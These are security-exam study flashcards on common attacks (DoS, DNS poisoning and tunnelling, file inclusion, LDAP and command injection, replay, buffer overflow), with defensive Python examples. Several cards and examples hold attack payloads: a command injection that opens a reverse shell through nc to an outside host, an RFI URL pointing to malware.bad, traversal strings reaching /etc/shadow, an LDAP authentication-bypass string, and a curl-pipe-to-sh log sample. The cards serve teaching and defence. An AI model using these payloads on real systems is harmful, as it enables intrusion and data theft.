Malicious activity Flashcards

1
Q

What are a few denial-of-service (DoS) attacks?

A
  1. SYN flood
  2. Amplified DNS attack (DNS amplification)
  3. Ping flood
  4. PDoS (Permanent Denial of Service) - damages the target (for example its firmware) so that it needs repair or replacement rather than just a reboot
  5. Fork bomb - a process calls fork() repeatedly, and each copy forks again, until the process table and memory are exhausted and the system hangs or crashes. "Fork" here refers to the fork() system call that creates a new process.
  6. DDoS (Distributed Denial of Service) - many compromised hosts (a botnet) flood the target at the same time
2
Q

What are a few prevention measures against DDoS attacks?

A
  1. Implement an IPS (Intrusion Prevention System) to drop attack traffic
  2. Black-hole or sinkhole routing - route traffic for the attacked address (or from the attacking sources) to a null route or to an analysis host
  3. Elastic cloud infrastructure - scale capacity out to absorb the flood
3
Q

What is a DNS cache poisoning attack?

A

In this attack, a threat actor inserts forged DNS records (domain names pointing to attacker-controlled IPs) into the cache of a DNS resolver, so that every client using that resolver is sent to the wrong host until the entry expires.

Protection techniques -

  1. Use DNSSEC (DNS Security Extensions) - the DNS responses that the resolver receives from authoritative servers carry cryptographic signatures, and a validating resolver rejects records whose signatures do not verify.
  2. Harden the resolver itself (patching, randomised source ports and transaction IDs, restricting who may query it).
4
Q

What is a DNS amplification attack?

A

In this attack, an attacker sends DNS queries whose source IP is spoofed to the victim's address, usually to open resolvers, asking for records that produce large answers.
The DNS servers send their large responses to the victim, so a small volume of attacker traffic becomes a much larger flood that overwhelms the victim's device or link.

5
Q

What is a DNS tunnelling attack?

A

In this attack, an attacker encodes another protocol's data (HTTP, SSH, raw files) inside DNS queries and responses, because DNS is usually allowed through firewalls that block other outbound traffic.
They might do it to exfiltrate data or to carry command-and-control traffic.

To protect from it, analyse DNS log data: look for unusually long or random-looking subdomains, a high volume of queries to a single domain, and heavy use of TXT or NULL records.
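As an added example (not part of the original flashcards), here is a small Python triage script that applies those DNS-log indicators to a constructed sample of resolver logs. The log format, the thresholds and the exfil.bad zone are all assumptions made for the demo:

```python
import math
import re
from collections import defaultdict

# Constructed sample of resolver query logs (not real traffic): one line per
# query, "client_ip qtype qname". The second client is tunnelling data out
# through long, high-entropy labels under a single attacker-controlled zone.
SAMPLE_DNS_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 AAAA mail.example.com
10.0.0.5 A cdn.example.net
10.0.0.9 TXT 4a6f686e20536d697468.9f8e7d6c5b4a39281706f5e4d3c2b1a0.exfil.bad
10.0.0.9 TXT 50617373776f72643a20.1a2b3c4d5e6f708192a3b4c5d6e7f809.exfil.bad
10.0.0.9 TXT 7365637265742e74787421.0f1e2d3c4b5a69788796a5b4c3d2e1f0.exfil.bad
10.0.0.9 TXT 4e657874206368756e6b.c0ffee0123456789abcdef0123456789.exfil.bad
10.0.0.9 TXT 4c6173742062797465.deadbeef0123456789abcdef01234567.exfil.bad
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character. Hex or base32 payloads score well above
    dictionary-word hostnames such as 'www' or 'mail'."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Crude eTLD+1 (last two labels). Fine for the sample; production code
    should consult a public-suffix list."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def score_query(qname: str, qtype: str) -> list[str]:
    """Return the per-query indicators that fire for one DNS name."""
    labels = qname.rstrip(".").split(".")
    subdomain = ".".join(labels[:-2])
    reasons = []
    if len(qname) > 100:
        reasons.append("long_qname")
    if any(len(label) > 50 for label in labels):
        reasons.append("long_label")
    if subdomain and shannon_entropy(subdomain) > 3.5:   # threshold: assumption
        reasons.append("high_entropy")
    if qtype in {"TXT", "NULL", "CNAME"} and subdomain:
        reasons.append(f"tunnel_friendly_qtype_{qtype}")
    return reasons


def find_tunnel_candidates(log_text: str, min_hits: int = 3) -> dict[str, set[str]]:
    """Aggregate hits per (client, registered domain) and report zones where at
    least min_hits queries from one client triggered indicators."""
    hits = defaultdict(int)
    reasons_by_zone = defaultdict(set)
    line_re = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")
    for line in log_text.splitlines():
        m = line_re.match(line.strip())
        if not m:
            continue
        client, qtype, qname = m.groups()
        reasons = score_query(qname, qtype)
        if reasons:
            zone = registered_domain(qname)
            hits[(client, zone)] += 1
            reasons_by_zone[zone].update(reasons)
    return {zone: reasons_by_zone[zone]
            for (client, zone), n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    for zone, reasons in find_tunnel_candidates(SAMPLE_DNS_LOG).items():
        print(f"possible DNS tunnel to {zone}: {sorted(reasons)}")
```

Only the exfil.bad zone is reported; the ordinary example.com lookups never trip an indicator. On real logs the per-client hit count is the important aggregation, since a single odd-looking name is common but dozens to one zone from one host is not.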

6
Q

What is a domain hijacking attack?

A

It is an attack in which an attacker takes control of someone else's domain name, typically by compromising the registrar account or by registering the domain when its registration lapses.
They might then deface the site, redirect it, or infect users who visit it.

To protect from it, protect the registrar account (strong unique password, MFA, registrar lock) and keep the registration and contact details current.

7
Q

What is a DNS zone transfer attack?

A

In this attack, a threat actor mimics an authorised secondary name server and requests (AXFR) the entire DNS zone for a domain from an authoritative server that does not restrict zone transfers.

This kind of attack exposes sensitive information about a network, such as internal host names and its overall architecture. Authoritative servers should allow transfers only to known secondaries (by IP address and TSIG key).

8
Q

What is a directory traversal attack?

A

In this attack, a threat actor is able to access unauthorised files, folders or commands outside the web document root (or elsewhere on the same server) by supplying path sequences such as ../ that the application passes straight through to the filesystem.

Here is an example of directory traversal -

https://diontraining.com/../../../etc/shadow

9
Q

What is an inclusion attack?

A

Inclusion attack - In this attack, a threat actor is able to make the application include a file of the attacker's choosing, and eventually to run that malicious file.

Example - a threat actor includes a file into a web application and has the server run it, which might lead to data theft, unexpected actions on the server, or arbitrary code execution.

It is of 2 types -

  1. Remote File Inclusion (RFI)
  2. Local File Inclusion (LFI)
10
Q

What is a remote file inclusion attack?

A

In this attack, a threat actor finds a file inclusion vulnerability in an application (most often a web application) and is able to include a file hosted on a remote server.
Once the file is included, the web application runs it.

Example -

https://diontraining.com/login.php?user=http://malware.bad/malicious.php

11
Q

What is local file inclusion?

A

In this malicious activity or attack, a threat actor includes a file that already exists on the web server host.

How can such a file already exist on the web server?
- the site might have an upload form, and the attacker may have used it to put a malicious file on the server; or the attacker may target a file that is always present (a log file, a system binary, a configuration file).

So in this attack, a threat actor makes the web application run the locally included file.
Normally this involves directory traversal -

Example -
https://diontraining.com/login.php?user=../../windows/system32/cmd.exe%00

(The trailing %00 is a URL-encoded null byte; in older PHP versions it truncated the path so that any extension the application appended was ignored.)

12
Q

What is an arbitrary code execution attack?

A

This attack takes place when an attacker is able to run any code or command of their own choice on the target system.

How does an attacker do it -
They exploit some vulnerability in the web application, system or network, such as a buffer overflow, an injection flaw, or a file inclusion vulnerability.

If the malicious code is triggered over the network, it is known as remote code execution (RCE).

13
Q

What is a privilege escalation attack?

A

This is an attack in which an attacker gains more access to a system resource than they were granted. Example - gaining write permission when only read permission was granted.

2 types -

Vertical privilege escalation - moving to a higher permission level, such as from a user account to an administrator account.

Horizontal privilege escalation - moving from one account to another at the same level, where both are user accounts but the second account has access to a certain file or resource that the first does not.

14
Q

What are the 2 main kinds of rootkits?

A

Kernel-mode rootkit (runs with kernel privileges, for example as a driver or loadable kernel module) and
User-mode rootkit (runs as an ordinary process or library and hooks user-space APIs)

15
Q

How can we protect from file inclusion attacks?

A
  1. Sanitise user input (strip or reject traversal sequences, null bytes and URLs)
  2. Perform user input validation (prefer an allow-list of the file names the application may include)
  3. Implement proper access controls for every account, including the web service account (the account the web server runs as), so that it can read only the files it needs
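Added example serving the directory traversal, RFI, LFI and file-inclusion-protection cards above (it is not code from the original page): the vulnerable include-path pattern beside a hardened resolver in Python. The web root, the allow-list of pages and the request values are constructed for the demo, and nothing touches the real filesystem:

```python
import posixpath
from urllib.parse import unquote

# Constructed web root and allow-list for the example (assumptions).
WEB_ROOT = "/var/www/html"
ALLOWED_PAGES = frozenset({"index.php", "login.php", "pages/about.php"})


def vulnerable_include_path(user_param: str) -> str:
    """The flawed pattern behind the traversal/LFI/RFI cards: the request
    parameter is glued onto the web root and handed to include().
    ../ sequences, null bytes and remote URLs all pass straight through."""
    return WEB_ROOT + "/" + user_param


def safe_include_path(user_param: str, allowed_pages: frozenset = ALLOWED_PAGES) -> str:
    """Hardened resolver: decode once, reject null bytes and remote URLs,
    normalise the path, confirm it stays under WEB_ROOT, then require the
    page to be on the allow-list. Raises ValueError on anything suspicious."""
    decoded = unquote(user_param)                 # %2F, %00 ... become real bytes
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    if "://" in decoded or decoded.startswith("//") or decoded.startswith("\\\\"):
        raise ValueError("remote file inclusion attempt")
    # normpath collapses ../ without consulting the disk (posixpath so the
    # behaviour is identical on every platform).
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    if posixpath.commonpath([WEB_ROOT, resolved]) != WEB_ROOT:
        raise ValueError("directory traversal outside web root")
    page = posixpath.relpath(resolved, WEB_ROOT)
    if page not in allowed_pages:
        raise ValueError(f"page not in allow-list: {page}")
    return resolved


def classify(user_param: str) -> tuple[str, str]:
    """Convenience wrapper: ('ok', path) or ('rejected', reason)."""
    try:
        return ("ok", safe_include_path(user_param))
    except ValueError as err:
        return ("rejected", str(err))


if __name__ == "__main__":
    for value in ("login.php", "../../../etc/shadow", "..%2F..%2F..%2Fetc%2Fshadow",
                  "../../windows/system32/cmd.exe%00",
                  "http://malware.bad/malicious.php", "....//....//etc/passwd"):
        print(f"{value!r:45} vulnerable -> {vulnerable_include_path(value)}")
        print(f"{'':45} hardened   -> {classify(value)}")
```

The allow-list is the layer that matters most: even a filter-bypass payload such as ....//....//etc/passwd, which normpath leaves inside the web root, is rejected because the resulting page name is not one the application ever intended to include.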
16
Q

What is a cookie poisoning attack and how can we protect from it?

A

It is the process of modifying the contents of a cookie (after the server has created it and sent it to the client's browser) in order to exploit vulnerabilities in the web application, for example by changing a role or user ID stored in the cookie.

How can we protect from it:
1. Encrypt and sign cookies so that tampered values are detected and rejected
2. Delete cookies when the session is done
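Added Python example (not from the original flashcards): signing a cookie with an HMAC so that a poisoned copy is rejected. The caveat a practitioner would want here is that encryption alone hides the contents but does not by itself detect modification; an authentication tag does. The secret key and the session fields are constructed for the demo:

```python
import base64
import binascii
import hashlib
import hmac
import json

# Constructed server-side secret for the example; in production load it from
# a secrets store and rotate it.
SECRET_KEY = b"example-only-secret-key-rotate-me"


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def issue_cookie(session: dict) -> str:
    """Server side: serialise the session and append an HMAC-SHA256 tag.
    Cookie value is '<payload>.<tag>'."""
    payload = json.dumps(session, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return f"{_b64(payload)}.{_b64(tag)}"


def verify_cookie(cookie: str):
    """Server side: return the session dict if the tag verifies, else None.
    Malformed input is treated the same as a bad tag."""
    try:
        payload_b64, tag_b64 = cookie.split(".", 1)
        payload = _unb64(payload_b64)
        tag = _unb64(tag_b64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):    # constant-time comparison
        return None
    return json.loads(payload)


def poison_cookie(cookie: str, **changes) -> str:
    """What the attacker does: decode the payload, edit a field, re-encode it
    and keep the old tag (they do not know SECRET_KEY)."""
    payload_b64, tag_b64 = cookie.split(".", 1)
    session = json.loads(_unb64(payload_b64))
    session.update(changes)
    payload = json.dumps(session, sort_keys=True, separators=(",", ":")).encode()
    return f"{_b64(payload)}.{tag_b64}"


if __name__ == "__main__":
    good = issue_cookie({"user": "alice", "role": "user"})
    bad = poison_cookie(good, role="admin")
    print("original verifies:", verify_cookie(good))
    print("poisoned verifies:", verify_cookie(bad))
```

Note that the payload is only base64, so the attacker can still read it; if the cookie carries anything confidential, encrypt it as well (an AEAD mode gives both properties at once). Keeping the session state server-side and storing only a random session ID in the cookie removes the problem entirely.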

17
Q

What are on-path attacks?

A

This is an attack in which an attacker inserts themselves in the middle of an authenticated session between a client and a web server.
Doing so, they can capture, monitor and analyse (and possibly modify) the traffic between the client and the web server.

One way an attacker can accomplish this is a downgrade attack, forcing both parties onto a weaker or unencrypted protocol.

18
Q

What is an SSL stripping attack?

A

In this attack, an on-path attacker downgrades the victim's connection from HTTPS to plain HTTP: the attacker keeps an HTTPS connection to the real server but rewrites links and redirects so that the victim's browser talks HTTP, letting the attacker read and alter the traffic. HTTP Strict Transport Security (HSTS) mitigates it by making the browser refuse plain HTTP for that site.

19
Q

What is an LDAP injection attack?

A

It is similar to a SQL injection attack.
In this attack, an attacker exploits an application that builds LDAP queries (search filters or DNs) from user input without escaping or validating it; the flaw is in the application, not in the LDAP protocol itself.
Normally this attack takes place on websites that use LDAP to authenticate users (a web sign-in page that queries an LDAP directory on the back end).
So in this attack, an attacker sends input that changes the meaning of the LDAP filter, for example to bypass authentication or to read other users' entries.

Protection technique -
1. Do input sanitisation (escape the LDAP filter metacharacters)
2. Do input validation (allow-list the characters a username may contain)
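Added Python example (not from the original flashcards) showing the vulnerable filter-building pattern beside an escaped and allow-listed version. The filter shape, the username policy and the payload are assumptions made for the demo:

```python
import re

# RFC 4515 escaping for values placed inside an LDAP search filter.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Constructed username policy (assumption): letters, digits, dot, underscore, hyphen.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def escape_filter_value(value: str) -> str:
    """Sanitisation step: neutralise the characters that carry structure."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def vulnerable_login_filter(username: str, password: str) -> str:
    """The flawed pattern: raw input interpolated into the filter string."""
    return f"(&(uid={username})(userPassword={password}))"


def safe_login_filter(username: str, password: str) -> str:
    """Validation (allow-list) first, then escaping of whatever is left."""
    if not USERNAME_RE.match(username):
        raise ValueError("username contains characters outside the allow-list")
    return (f"(&(uid={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(password)}))")


def is_acceptable_username(username: str) -> bool:
    return bool(USERNAME_RE.match(username))


def count_filter_components(filter_str: str) -> int:
    """Number of '(' in the filter. A login filter of this shape has exactly
    3; any more means the input injected extra structure."""
    return filter_str.count("(")


if __name__ == "__main__":
    payload = "*)(uid=*))(|(uid=*"        # classic authentication-bypass input
    print("vulnerable:", vulnerable_login_filter(payload, "x"))
    print("escaped   :", escape_filter_value(payload))
    print("safe      :", safe_login_filter("alice", "p*ss)word"))
```

Two further points for real code: escaping rules for distinguished names (RFC 4514) differ from filter escaping, so do not reuse this table for DNs; and an application should authenticate by binding to the directory with the user's credentials rather than by comparing userPassword inside a search filter.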

20
Q

What is a command injection attack?

A

In this attack, a threat actor is able to execute an arbitrary shell command via a vulnerable web application that passes user input to the operating system shell.

Example - a page that lets the user "check the ping" to a host and passes the host name straight to the shell. Submitting the following as the host name runs the attacker's command after the ping and opens a reverse shell:

diontraining.com && /bin/sh |nc hacked.diotraining.com 443
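Added Python example (not from the original flashcards) of the ping-check scenario: the vulnerable string-building pattern, then a validated argv list that never reaches a shell. The hostname rule is an assumption for the demo, and nothing here actually executes ping:

```python
import ipaddress
import re
import shlex

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"                                          # total length
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"    # leading labels
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"          # last label
)


def vulnerable_ping_command(target: str) -> str:
    """The flawed pattern: user input interpolated into a command line that is
    then run with os.system() or subprocess.run(..., shell=True). The shell
    interprets &&, |, ;, backticks and $(...) in the value."""
    return f"ping -c 1 {target}"


def validate_target(target: str) -> str:
    """Allow-list validation: the value must parse as an IP address or match
    the hostname grammar. Anything else is rejected before it goes anywhere."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"not a valid hostname or IP address: {target!r}")


def is_valid_target(target: str) -> bool:
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def safe_ping_argv(target: str) -> list[str]:
    """Validate, then build an argv list for subprocess.run(argv) (shell=False),
    so no shell ever parses the user's value."""
    return ["ping", "-c", "1", validate_target(target)]


def quoted_fallback(target: str) -> str:
    """If a shell string truly cannot be avoided, shlex.quote() neutralises the
    metacharacters. Validation should still run first."""
    return f"ping -c 1 {shlex.quote(target)}"


if __name__ == "__main__":
    payload = "diontraining.com && /bin/sh |nc hacked.diotraining.com 443"
    print("vulnerable:", vulnerable_ping_command(payload))
    print("valid?    :", is_valid_target(payload))
    print("safe argv :", safe_ping_argv("diontraining.com"))
    # subprocess.run(safe_ping_argv("diontraining.com"), timeout=5) would run it
```

The argv form is the fix; the validation is defence in depth that also stops a value such as -c 1000 from being read as an option by ping itself.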

21
Q

What is a process injection attack?

A

It is a method of executing arbitrary code in the address space of a separate live process.
Process injection is commonly used by malware, rootkits and advanced persistent threats (APTs) to evade detection (the injected code runs under a legitimate process name) and to maintain persistence on compromised systems.

22
Q

What is a software weakness?

A

A software weakness is a flaw or defect in the design, implementation, or configuration of software that can potentially lead to security vulnerabilities.

Examples of software weaknesses include buffer overflows, input validation errors, lack of proper authentication mechanisms, insecure configuration settings, etc.

These can be prevented using secure coding practices.

23
Q

What is the difference between a software weakness and a vulnerability?

A

A software weakness is a generic class of flaw or defect in software that could lead to vulnerabilities, while a vulnerability is a specific instance of a weakness in a particular product that an attacker can exploit to compromise the security of a system. (CWE catalogues weakness types; CVE catalogues individual vulnerabilities.)

24
Q

What is CWE?

A

It stands for Common Weakness Enumeration. It is a catalogue maintained by MITRE that keeps track of common software (and hardware) weakness types, each with its own CWE identifier.
It provides a common language (a structured format) for describing these weaknesses.

25
Q

What are the 2 most common indicators of an on-path attack (man-in-the-middle attack)?

A

1st indicator: there can be extra delay in the session, as our traffic first goes to the on-path computer, which may decrypt and re-encrypt the data before passing it on to the server.

2nd indicator: the browser might not show the lock icon beside the URL, and there may be a certificate warning because the certificate presented is not signed by a trusted CA (Certificate Authority).
26
Q

What is a man-in-the-browser attack?

A

In this attack, malware (typically a trojan or a malicious browser extension) runs inside the user's browser and can read and modify pages, form data and session information before they are encrypted and sent. It can also capture keystrokes and steal the user's passwords for different accounts.

This attack is normally initiated by sending the user a malicious link or download and tricking them into opening it, which installs the malware or exploits a vulnerability in the browser.
27
Q

What is a DNS sinkhole?

A

A DNS sinkhole is a deliberately false DNS record (or zone) on a DNS server that returns a controlled address instead of the real one for a domain. It is used by investigators and defenders to stop botnets or other malware from reaching their command and control (C2) servers, since malware usually contacts its C2 server by domain name; the sinkhole also lets the defender log which internal hosts are infected.

28
Q

What is the most effective countermeasure against a replay attack?

A

Use of timestamps and sequence numbers (bound to the message by a MAC or signature, so that the attacker cannot simply update them)
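Added Python example (not from the original flashcards) of a receiver applying both countermeasures, with the timestamp and sequence number bound to the message body by an HMAC. The shared key, the skew window and the messages are constructed for the demo:

```python
import hashlib
import hmac
import time

# Constructed shared key for the demo; a real deployment provisions one per peer.
SHARED_KEY = b"constructed-demo-key-not-for-production"
MAX_CLOCK_SKEW = 30.0   # seconds a message timestamp may differ from our clock (assumption)


def _mac(seq: int, ts: float, body: str) -> str:
    """MAC over sequence number, timestamp and body together, so none of the
    three can be changed without the key."""
    data = f"{seq}|{ts:.3f}|{body}".encode()
    return hmac.new(SHARED_KEY, data, hashlib.sha256).hexdigest()


def make_message(seq: int, ts: float, body: str) -> dict:
    """Sender side."""
    return {"seq": seq, "ts": ts, "body": body, "mac": _mac(seq, ts, body)}


class ReplayGuard:
    """Receiver side. One instance per sender, since sequence numbers are
    tracked per sender. `now` is injectable so the window can be tested."""

    def __init__(self, now=time.time):
        self._now = now
        self._last_seq = 0

    def accept(self, msg: dict) -> tuple[bool, str]:
        # 1. Authenticate first; otherwise an attacker could forge fresh ts/seq.
        if not hmac.compare_digest(msg["mac"], _mac(msg["seq"], msg["ts"], msg["body"])):
            return False, "bad MAC"
        # 2. Freshness window: a capture cannot be replayed much later.
        if abs(self._now() - msg["ts"]) > MAX_CLOCK_SKEW:
            return False, "timestamp outside window"
        # 3. Strictly increasing sequence: a capture replayed inside the window
        #    is caught too.
        if msg["seq"] <= self._last_seq:
            return False, "sequence number already seen"
        self._last_seq = msg["seq"]
        return True, "accepted"


if __name__ == "__main__":
    guard = ReplayGuard()
    first = make_message(1, time.time(), "transfer 10 to bob")
    print("first delivery :", guard.accept(first))
    print("replayed       :", guard.accept(first))
```

The order of the checks matters: the MAC is verified before the timestamp or counter is trusted, the window bounds how long the receiver must remember anything, and the counter closes the gap the window leaves open.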

29
Q

How can we investigate script-related attacks?

A

Using logs (process creation logs, PowerShell script block logs, and shell execution records)

30
Q

A note on scripting attacks

A

PowerShell cmdlets use a Verb-Noun structure such as Invoke-Command. Bash scripts typically call either /bin/bash or /bin/sh. If logs show Verb-Noun cmdlets or calls to bash or sh, it may be a potential indicator of a scripting attack.

31
Q

What are some of the common verbs and common nouns used in PowerShell?

A

Common verbs - Get, Add, Test, Remove, New, Find, and Move

Common nouns - Command, Service, Location, Process, ChildItem, WmiObject, PSDrive

WMI stands for Windows Management Instrumentation.
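Added Python example (not from the original flashcards) that applies the indicators from the last three cards to constructed log lines. The log format, the extension of the verb list and the regexes are assumptions made for the demo:

```python
import re

# Constructed log lines (not from a real system): Windows 4688/4104-style
# entries and Linux auditd EXECVE records, reduced to the fields that matter.
SAMPLE_LOGS = [
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="powershell -nop -w hidden -enc SQBuAHYAbwBrAGUA"',
    'EventID=4104 ScriptBlockText="Invoke-Command -ComputerName srv01 -ScriptBlock { Get-Process }"',
    'EventID=4688 NewProcessName=C:\\Program Files\\App\\app.exe CommandLine="app.exe --update"',
    'type=EXECVE argc=3 a0="/bin/sh" a1="-c" a2="curl http://198.51.100.7/x.sh | sh"',
    'type=EXECVE argc=2 a0="/usr/bin/ls" a1="-la"',
    'EventID=4104 ScriptBlockText="Get-ChildItem C:\\Users"',
]

# Verbs from the card, extended (assumption) with Invoke, Set and Start, which
# appear in the Invoke-Command example and in common attack tooling.
CMDLET_VERBS = {"Get", "Add", "Test", "Remove", "New", "Find", "Move", "Invoke", "Set", "Start"}
CMDLET_RE = re.compile(r"\b([A-Z][a-z]+)-([A-Z][A-Za-z]+)\b")
SHELL_RE = re.compile(r"/bin/(?:ba)?sh\b|\bpowershell(?:\.exe)?\b|\bpwsh\b")
# Switches that hide or obfuscate PowerShell execution (-nop, -w hidden, -enc ...).
HIDDEN_FLAGS_RE = re.compile(
    r"(?i)(?:^|\s)-(?:nop|noprofile|w\s+hidden|windowstyle\s+hidden|e(?:nc|ncodedcommand)?)\b"
)


def indicators(line: str) -> list[str]:
    """Return the indicators that fire for one log line."""
    found = []
    for verb, noun in CMDLET_RE.findall(line):
        if verb in CMDLET_VERBS:
            found.append(f"cmdlet:{verb}-{noun}")
    if SHELL_RE.search(line):
        found.append("shell_interpreter")
    if HIDDEN_FLAGS_RE.search(line):
        found.append("hidden_or_encoded_powershell")
    return found


def triage(lines) -> dict[int, list[str]]:
    """Map line index -> indicators, keeping only lines that fired."""
    return {i: hits for i, line in enumerate(lines) if (hits := indicators(line))}


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_LOGS).items():
        print(f"line {idx}: {hits}\n    {SAMPLE_LOGS[idx]}")
```

A plain Get-ChildItem is flagged as well as the encoded hidden-window launch, which is the point of the card: these are indicators to review, not verdicts, and the hidden/encoded flags are what lift a line from "administrator at work" to "worth an incident ticket".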

32
Q

What is a memory leak?

A

It is a bug in a computer program that makes the program use more and more memory the longer it runs, because memory it allocates is never freed.

It is possible to detect memory leaks by watching memory usage per application in operating system tools such as Windows Task Manager: a leaking process's memory grows steadily and never comes back down.

33
Q

What is a buffer overflow attack?

A

In this attack, an attacker sends more data to an application than the buffer it writes into can hold, so the excess overwrites adjacent memory (on the stack this can include the saved return address).

The payload normally has a run of NOPs (no-operation instructions, which simply let the CPU step on to the next instruction) followed by the malicious shellcode.

This NOP sled means the attacker does not need the exact address of the shellcode: if the overwritten return address lands anywhere in the sled, execution slides along it into the shellcode.
